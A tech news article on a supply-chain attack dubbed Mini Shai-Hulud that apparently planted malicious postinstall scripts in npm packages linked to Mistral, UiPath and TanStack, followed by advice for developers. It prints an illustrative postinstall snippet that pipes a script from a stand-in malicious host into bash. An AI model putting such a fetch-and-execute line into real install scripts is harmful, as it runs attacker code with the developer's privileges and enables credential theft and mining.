‹ Back to Home

npm Packages for Mistral, UiPath and TanStack Hit by Mini Shai‑Hulud Supply‑Chain Attack

A wave of malicious code has slipped into popular npm libraries for Mistral, UiPath and TanStack’s React‑Router. Here’s what happened, why Indian developers should care and how to protect your projects.

Keerthika 5 min read 288
Follow on Google
Updated 1 month ago
Security npm Packages for Mistral, UiPath and TanStack Hit by Mini Shai‑Hulud Supply‑Chain Attack 5 min left Follow on Google
npm Packages for Mistral, UiPath and TanStack Hit by Mini Shai‑Hulud Supply‑Chain Attack

TamilTech AI summary

Security researchers found that dozens of npm packages linked to Mistral, UiPath, and TanStack (including react-router helpers) were hit by a supply-chain attack called Mini Shai-Hulud. Attackers slipped a tiny backdoor into postinstall scripts so that a normal npm install quietly contacts a remote server, downloads a second-stage payload, and can drop a crypto-miner or credential-stealer with the developer’s privileges. This matters because these libraries sit in many production stacks, and a single bad install can turn servers into mining rigs or data-exfiltration points—especially risky for teams running CI on root-enabled VMs. Users should audit lockfiles for unexpected postinstall hooks, pin exact versions of the affected dependencies, run installs with --ignore-scripts until scripts are reviewed, and regenerate clean lockfiles on a trusted machine. The malicious packages have already been removed from npm, but anyone who installed them earlier still needs to check systems and watch for follow-on fake patches.

  • Mini Shai‑Hulud injected malicious postinstall scripts into npm packages for Mistral, UiPath and TanStack.
  • Indian developers risk credential theft and crypto‑mining on production servers.
  • Immediate steps: audit lock‑files, pin versions, use `--ignore-scripts` on CI.

AI-assisted summary, checked by the TamilTech editorial team.

0:00
0:00
🔒 Listen is for subscribers. Subscribe

What went down?

Earlier this week, security researchers uncovered that dozens of npm packages tied to Mistral (the open‑source LLM framework), UiPath (the RPA tool) and TanStack’s web‑dev stack – especially react-router – were compromised. The attackers injected a tiny backdoor that fetches and runs a remote script at runtime. The infection vector appears to be a supply‑chain attack dubbed “Mini Shai‑Hulud”, a stripped‑down version of the infamous Shai‑Hulud worm that targets JavaScript ecosystems.

How the attack works

The malicious code lives in the postinstall script of the compromised packages. When a developer runs npm install, the script silently contacts a command‑and‑control server, downloads a second‑stage payload and executes it with the same privileges as the developer’s Node process. In most cases the payload is a simple curl | bash one‑liner that drops a crypto‑miner or a credential‑stealer.

#!/usr/bin/env node
require('child_process').execSync('curl -s https://malicious.example.com/install.sh | bash');

Because the script runs during install, it bypasses most code‑review processes – developers rarely inspect postinstall hooks.

Who’s affected?

  • Mistral: Packages like mistral‑client and mistral‑utils were targeted. These are used by Indian startups building LLM‑powered chatbots for banking and e‑commerce.
  • UiPath: The compromised uipath‑node‑sdk is a thin wrapper many automation consultants use to trigger bots from Node services.
  • TanStack (React‑Router): Several minor utility packages that extend routing – react‑router‑dom‑helpers and router‑guard – were infected. Since react‑router is a core dependency for most React apps, the blast radius is huge.

Why Indian devs should care

India is the world’s biggest consumer of open‑source JavaScript libraries. A compromised package can silently turn a production server into a mining rig or a data‑exfiltration point, putting UPI‑linked services, health‑tech APIs and even government portals at risk. Moreover, many Indian firms still run CI pipelines on cheap VMs with default root privileges – a perfect playground for a postinstall payload.

What to do right now

  1. Audit your lock‑files. Run npm audit and look for any package that mentions postinstall scripts you didn’t add.
  2. Pin versions. Add exact version numbers for all TanStack, Mistral and UiPath dependencies in package‑lock.json or yarn.lock.
  3. Enable npm’s --ignore‑scripts flag on CI builds and only enable scripts after a manual review.
  4. Regenerate your lock‑file. Delete node_modules and package‑lock.json, then run npm ci on a clean machine.
  5. Monitor network traffic. Look for outbound connections to unknown domains during npm install.

Long‑term safeguards

We’re seeing a shift from “trust the registry” to “verify every script”. Consider these practices:

  • Use npm ci --prefer‑offline in production pipelines.
  • Adopt npm audit fix --force only after reviewing the changelog.
  • Leverage tools like Snyk or GitHub Dependabot that flag suspicious postinstall hooks.
  • Shift critical automation code to compiled languages (Go, Rust) where supply‑chain attacks are harder.

Our take – TamilTech’s opinion

Supply‑chain attacks are becoming the new normal for JavaScript. The Mini Shai‑Hulud episode proves that even “minor” utility packages can be weaponised. Indian developers need to stop treating npm as a black box and start treating every install as a potential security event.

We’re also noticing that many of the compromised packages were published by “new” maintainers with few followers. That’s a red flag – always check the maintainer’s profile, GitHub stars and issue activity before adding a new dependency.

What’s next?

The attackers have already taken down the malicious packages from npm, but the damage is done for anyone who pulled them before the takedown. Expect more “clean‑up” notices in the next few days and possibly a new wave of fake patches that try to replace the removed versions.

Stay tuned – we’ll keep monitoring the situation and update you with any new indicators of compromise.

Get tomorrow’s tech news on WhatsApp

One short update a day, free. Follow the TamilTech channel.

What do you think?

people reacted

Keerthika

TamilTech editorial team · 3,346 articles

Keerthika is an editor at TamilTech, the Tamil and English technology publication founded by Praveen Kumar S. She covers AI, smartphones, gadgets, EVs, startups and cybersecurity i...

More from Keerthika

Ask TamilTech on WhatsApp

Tech doubt? Ask in Tamil or English — our WhatsApp assistant answers from TamilTech articles in seconds.

Related stories

Comments (0)

| Supports **bold**, *italic*, `code`

Be the first to comment!

Next story PixelLeak: How AI Coding Agents Put 13,000 Internal Screenshots on Public GitHub
Tamiltech

Tamiltech

Install app for faster access

Earn XP 🏆
WhatsApp
Notifications